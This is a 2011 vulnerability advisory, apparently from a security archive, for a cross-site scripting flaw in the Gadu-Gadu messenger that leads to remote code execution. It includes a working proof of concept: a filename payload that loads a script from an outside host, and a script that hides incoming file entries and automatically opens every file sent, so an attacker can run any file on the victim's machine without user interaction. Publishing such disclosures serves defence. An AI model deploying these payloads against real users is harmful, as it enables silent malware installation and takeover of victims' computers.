Gadu-Gadu Code Execution / Cross Site Scripting

2011.05.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Vendor: Gadu-Gadu (http://gadu-gadu.pl) Vulnerable Version: All Vulnerability Type: XSS, Remote Code Execution Risk level: Very High Credit: Kacper Szczesniak <kacper3.14@gmail.com> Vulnerability Details: Gadu-Gadu improperly handles file transfer requests. It's possible to place 255 chars of HTML code (no slash) inside the filename. This can lead to injecting JavaScript into UI using crafted file-send-request packet. It's possible to trigger various actions from GUI JavaScript code such as saving and running any file on victim's host. Internal protocols are abused for these purposes. No 'security' mechanisms like ASLR or DEP will stop this attack because it's JS code. No user interaction needed. PoC: file name that loads external x.js code: <input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);" autofocus> example x.js code to hide, accept and open every file request: document.getElementById('extra').innerHTML = '<style>.file, .entrySeparator{display:none;}</style>'; n = document.getElementById('open_file'); n.setAttribute('id', ''); function ff(){ if(f = document.getElementById('open_file')) { e = document.createEvent("HTMLEvents"); e.initEvent('click', true, true); f.dispatchEvent(e); f.setAttribute('id', ''); } setTimeout('ff()', 1000); } ff(); Now you can just send any file and it'll be silently auto-download and executed kacper


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top